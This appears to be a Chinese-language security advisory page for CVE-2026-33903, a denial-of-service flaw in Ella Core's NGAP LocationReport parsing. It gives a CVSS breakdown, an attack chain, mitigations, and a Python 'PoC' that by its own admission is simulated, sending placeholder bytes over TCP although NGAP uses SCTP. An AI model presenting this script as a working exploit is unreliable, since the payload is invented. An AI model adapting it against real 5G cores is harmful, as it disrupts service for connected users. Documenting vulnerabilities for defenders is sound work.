CVE-2026-33903 CVSS 6.5 中危

CVE-2026-33903 Ella Core NGAP消息拒绝服务漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33903

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ella Core

漏洞概述

Ella Core是一款用于私有网络的5G核心网软件。在1.7.0版本之前，其在处理特制的NGAP LocationReport消息时存在逻辑缺陷，导致进程崩溃。未经认证的攻击者可通过邻接网络发送恶意数据包触发该漏洞，造成服务中断，影响所有连接用户。厂商已在1.7.0版本中修复此问题。

技术细节

该漏洞根源在于Ella Core在处理NGAP（下一代应用协议）Location Report消息时未对特定字段进行足够的边界检查或异常捕获。攻击者通过构造恶意的NGAP消息数据包，利用协议解析逻辑中的缺陷，诱导核心网进程进入不可恢复的状态（Panic）。根据CVSS 3.1评分向量（AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H），此漏洞利用难度低，无需用户交互及身份认证。一旦漏洞被成功触发，将导致Ella Core服务进程直接崩溃，造成拒绝服务攻击（DoS），致使所有连接到该核心网的5G终端用户失去网络连接服务，严重影响业务连续性。建议管理员尽快应用补丁以修复此高危逻辑缺陷。

攻击链分析

STEP 1

Reconnaissance

攻击者扫描网络以发现Ella Core 5G核心网设备的IP地址和开放端口（如SCTP端口）。

STEP 2

Access

攻击者接入与Ella Core相邻的网络（AV:A），获取发送数据包的能力。

STEP 3

Exploitation

攻击者构造特制的NGAP LocationReport消息，其中包含能够触发解析错误的恶意字段。

STEP 4

Execution

将恶意消息发送至目标Ella Core设备的NGAP处理接口。

STEP 5

Impact

Ella Core进程在处理消息时发生Panic并崩溃，导致所有连接的订阅用户服务中断（DoS）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

# This is a simulated Proof of Concept (PoC) for CVE-2026-33903.
# It demonstrates how a malformed NGAP message might be sent to trigger the panic.
# Note: Actual NGAP protocol implementation (usually over SCTP) is required for a real exploit.

def send_malformed_ngap(target_ip, target_port):
    try:
        # Simulating a crafted NGAP LocationReport message payload.
        # The specific bytes causing the panic would require fuzzing or analysis of the specific commit.
        # This represents a trigger packet structure.
        malicious_payload = b"\x00\x0e\x40" + b"\x00" * 10 + b"\xff\xff" + b"A" * 200

        print(f"[*] Sending malformed NGAP packet to {target_ip}:{target_port}...")
        
        # NGAP typically runs over SCTP, but for demonstration we use a TCP socket wrapper
        # or assume the tester has an environment setup to route this.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        s.send(malicious_payload)
        s.close()
        print("[+] Payload sent successfully. Check target for service crash.")

    except Exception as e:
        print(f"[-] Error during exploit execution: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    TARGET_IP = "192.168.1.100"
    TARGET_PORT = 36412  # Standard NGAP port (SCTP)
    send_malformed_ngap(TARGET_IP, TARGET_PORT)

影响范围

Ella Core < 1.7.0

防御指南

临时缓解措施

如果无法立即升级，建议在网络入口处部署深度包检测（DPI）工具，过滤异常的NGAP LocationReport消息。同时，配置核心网进程监控与自动重启机制，以在崩溃发生后尽快恢复服务，减少业务中断时间。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表